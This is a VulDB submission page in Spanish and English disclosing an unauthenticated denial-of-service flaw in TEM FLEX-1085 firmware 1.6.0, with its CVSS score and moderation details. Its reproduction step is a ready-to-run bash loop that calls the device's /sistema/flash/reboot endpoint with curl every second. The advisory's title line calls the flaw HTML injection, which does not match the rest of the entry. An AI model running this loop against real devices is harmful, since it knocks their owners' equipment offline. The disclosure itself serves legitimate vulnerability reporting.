| Título | FLEX-1085 Web Denial of Service |
|---|
| Descripción | # Exploit Title: FLEX-1085 Web Denial of Service
# Date: 30/07/2022
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux
Title:
================
FLEX 1085 Web - HTML Injection
Summary:
================
A vulnerability, which was classified as problematic, was found in TEM FLEX-1085 1.6.0. Affected is an unknown function. The issue was identified as Denial of Service, allowing an unauthenticated malicious user to leave the device idle.
Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Product:
================
FLEX 1085 Web v1.6.0
Steps to Reproduce:
================
1. Run this command in your terminal:
TARGET=http://target.com;while true;do curl -s $TARGET/sistema/flash/reboot > /dev/null;sleep 1;done |
|---|
| Fuente | ⚠️ https://www.tem.ind.br/?page=prod-detalhe&id=94&sid=0 |
|---|
| Usuario | mrempy (UID 24379) |
|---|
| Sumisión | 2022-07-31 02:23 (hace 4 años) |
|---|
| Moderación | 2022-07-31 09:16 (7 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 205344 [TEM FLEX-1085 1.6.0 /sistema/flash/reboot denegación de servicio] |
|---|
| Puntos | 17 |
|---|